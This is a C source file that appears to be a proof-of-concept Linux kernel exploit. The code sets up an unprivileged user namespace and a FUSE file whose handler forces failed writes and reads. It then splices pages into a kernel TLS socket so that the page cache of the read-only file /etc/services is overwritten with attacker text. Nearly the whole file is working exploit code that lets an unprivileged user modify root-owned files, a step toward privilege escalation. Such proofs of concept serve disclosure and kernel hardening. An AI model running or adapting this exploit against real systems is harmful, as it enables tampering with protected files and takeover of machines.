#define _GNU_SOURCE
#include <assert.h>
#include <err.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <stdbool.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <linux/fuse.h>
#include <linux/tls.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static void write_file(char *name, char *buf) {
  int fd = SYSCHK(open(name, O_WRONLY));
  if (write(fd, buf, strlen(buf)) != strlen(buf))
    err(1, "write %s", name);
  close(fd);
}

static void write_map(char *name, int outer_id) {
  char buf[100];
  sprintf(buf, "0 %d 1", outer_id);
  write_file(name, buf);
}

static int fuse_fd;
#define READ(_obj) if (read(fuse_fd, &(_obj), sizeof(_obj)) != sizeof(_obj)) err(1, "failed to read " #_obj)
#define WRITE(_obj) if (write(fuse_fd, &(_obj), (_obj).h.len) != (_obj).h.len) err(1, "failed to write " #_obj)
static void fuse_server(void) {
  struct fuse_attr_out attrs = { .attr_valid = FATTR_SIZE | FATTR_MODE, .attr = { .size = 0x100000, .mode = 0100777 } };
  bool saw_write = false;
  while (1) {
    struct {
      struct fuse_in_header inh;
      union {
        struct fuse_init_out init_out;
        struct fuse_open_in open_in;
        struct fuse_read_in read_in;
        char pad[10000];
      };
    } buf;
    assert(SYSCHK(read(fuse_fd, &buf, sizeof(buf))) >= sizeof(buf.inh));
    if (buf.inh.opcode == FUSE_INIT) {
      printf("fuse: init\n");
      struct {
        struct fuse_out_header h;
        struct fuse_init_in b;
      } reply = {
        .h = { .len = sizeof(reply), .error = 0, .unique = buf.inh.unique },
        .b = { .major = buf.init_out.major, .minor = buf.init_out.minor }
      };
      WRITE(reply);
    } else if (buf.inh.opcode == FUSE_OPEN) {
      printf("fuse: open\n");
      struct {
        struct fuse_out_header h;
        struct fuse_open_out b;
      } reply = {
        .h = { .len = sizeof(reply), .error = 0, .unique = buf.inh.unique },
        .b = { .open_flags = 0 }
      };
      WRITE(reply);
    } else if (buf.inh.opcode == FUSE_FLUSH) {
      printf("fuse: flush\n");
      struct {
        struct fuse_out_header h;
      } reply = {
        .h = { .len = sizeof(reply), .error = 0, .unique = buf.inh.unique },
      };
      WRITE(reply);
    } else if (buf.inh.opcode == FUSE_GETATTR) {
      printf("fuse: getattr\n");
      struct {
        struct fuse_out_header h;
        struct fuse_attr_out b;
      } reply = {
        .h = { .len = sizeof(reply), .error = 0, .unique = buf.inh.unique },
        .b = attrs
      };
      WRITE(reply);
    } else if (buf.inh.opcode == FUSE_WRITE) {
      printf("fuse: write (failing all R/W from here on)\n");
      saw_write = true;
      struct {
        struct fuse_out_header h;
      } reply = {
        .h = { .len = sizeof(reply), .error = -ENOPKG, .unique = buf.inh.unique },
      };
      WRITE(reply);
    } else if (buf.inh.opcode == FUSE_READ) {
      printf("fuse: read (offset=0x%lx, size=0x%lx)\n", (unsigned long)buf.read_in.offset, (unsigned long)buf.read_in.size);
      assert(buf.read_in.size <= 0x1000);
      if (saw_write) {
        struct {
          struct fuse_out_header h;
        } reply = {
          .h = { .len = sizeof(reply), .error = -ENOPKG, .unique = buf.inh.unique },
        };
        WRITE(reply);
      } else {
        struct {
          struct fuse_out_header h;
          char data[0x1000];
        } reply = {
          .h = { .len = sizeof(reply.h) + buf.read_in.size, .error = 0, .unique = buf.inh.unique },
          .data = "HELLO"
        };
        WRITE(reply);
      }
    } else {
      printf("FUSE_??? %d !!!!!!!!!!!!!\n", buf.inh.opcode);
      struct {
        struct fuse_out_header h;
      } reply = {
        .h = { .len = sizeof(reply), .error = -ENOSYS, .unique = buf.inh.unique },
      };
      WRITE(reply);
    }
  }
  close(fuse_fd);
}

int main(void) {
  // boilerplate start code
  sync();
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);

  // pipe for splicing
  int tpipe[2];
  SYSCHK(pipe(tpipe));

  // add target page to pipe
  {
    int clobber_target_fd = SYSCHK(open("/etc/services", O_RDONLY));
    off64_t off_in = 0;
    SYSCHK(splice(clobber_target_fd, &off_in, tpipe[1], NULL, 0x100, 0));
    close(clobber_target_fd);
  }

  // set up user namespace (for unprivileged access to FUSE)
  int outer_uid = getuid();
  int outer_gid = getgid();
  SYSCHK(unshare(CLONE_NEWUSER|CLONE_NEWNS));
  SYSCHK(mount(NULL, "/", NULL, MS_PRIVATE|MS_REC, NULL));
  write_file("/proc/self/setgroups", "deny");
  write_map("/proc/self/uid_map", outer_uid);
  write_map("/proc/self/gid_map", outer_gid);

  // create a FUSE mount, and handle requests in a child
  SYSCHK(close(SYSCHK(open("/tmp/mntfile", O_RDONLY|O_CREAT, 0666))));
  fuse_fd = SYSCHK(open("/dev/fuse", O_RDWR));
  char mount_data[4096];
  sprintf(mount_data, "fd=%d,rootmode=0100777,user_id=%d,group_id=%d", fuse_fd, getuid(), getgid());
  SYSCHK(mount("blah", "/tmp/mntfile", "fuse", MS_NODEV|MS_NOSUID, mount_data));
  if (SYSCHK(fork()) == 0) {
    SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
    fuse_server();
    exit(0);
  }

  int fuse_file = SYSCHK(open("/tmp/mntfile", O_RDWR));
  SYSCHK(posix_fadvise(fuse_file, 0, 0, POSIX_FADV_RANDOM));
  printf("opened fuse file\n");

  // HACK:
  // FUSE support for mounting file as root is a bit broken, or maybe it's
  // sendfile()'s fault?
  // Anyway, we have to call fstat() to give the inode the right size.
  printf("calling fstat()\n");
  struct stat st;
  SYSCHK(fstat(fuse_file, &st));
  printf("st_size = 0x%lx\n", (unsigned long)st.st_size);

  // splice first page from the fuse file
  {
    off64_t off_in = 0;
    SYSCHK(splice(fuse_file, &off_in, tpipe[1], NULL, 1, 0));
  }

  // Write into the FUSE file. Our write handler returns an error, which will
  // leave the page in !Uptodate state.
  // From here on, our read handler will also return errors, which prevents the
  // page from becoming Uptodate again.
  assert(pwrite(fuse_file, "A", 1, 0) == -1);

  // create TCP listen socket
  int ssock = SYSCHK(socket(AF_INET, SOCK_STREAM, 0));
  SYSCHK(listen(ssock, 1));
  struct sockaddr_in bind_addr;
  int defer_opt = 1;
  SYSCHK(setsockopt(ssock, IPPROTO_TCP, TCP_DEFER_ACCEPT, &defer_opt, sizeof(defer_opt)));
  socklen_t bind_addr_len = sizeof(bind_addr);
  SYSCHK(getsockname(ssock, (struct sockaddr *)&bind_addr, &bind_addr_len));

  // create connected TCP client socket
  int sock = SYSCHK(socket(AF_INET, SOCK_STREAM, 0));
  SYSCHK(connect(sock, (struct sockaddr *)&bind_addr, sizeof(bind_addr)));
  SYSCHK(write(sock, "a", 1));
  SYSCHK(accept(ssock, NULL, NULL));

  // enable ktls on the client socket (in TX direction)
  SYSCHK(setsockopt(sock, SOL_TCP, TCP_ULP, "tls", sizeof("tls")));
  struct tls12_crypto_info_aes_gcm_128 crypto_info = {
    .info.version = TLS_1_2_VERSION,
    .info.cipher_type = TLS_CIPHER_AES_GCM_128,
  };
  SYSCHK(setsockopt(sock, SOL_TLS, TLS_TX, &crypto_info, sizeof(crypto_info)));

  /*
   * splice() file pages into the socket.
   * Older kernels disregard SPLICE_F_MORE and only look at MSG_SENDPAGE_NOTLAST
   * in this codepath.
   * So we need to splice two file pages at once, where the first file page is
   * the target page we want to clobber, and the second file page is a page that
   * fails ->confirm() due to having been truncated.
   * This way, the first file page will be given to the socket with
   * MSG_SENDPAGE_NOTLAST, but there won't actually be a second sendpage call.
   *
   * Assert that only the target page gets spliced.
   */
  assert(splice(tpipe[0], NULL, sock, NULL, 0x101, SPLICE_F_MORE) == 0x100);

  {
    char buf[] = "# HELLO WORLD  ";
    send(sock, buf, strlen(buf), MSG_MORE);
  }
}
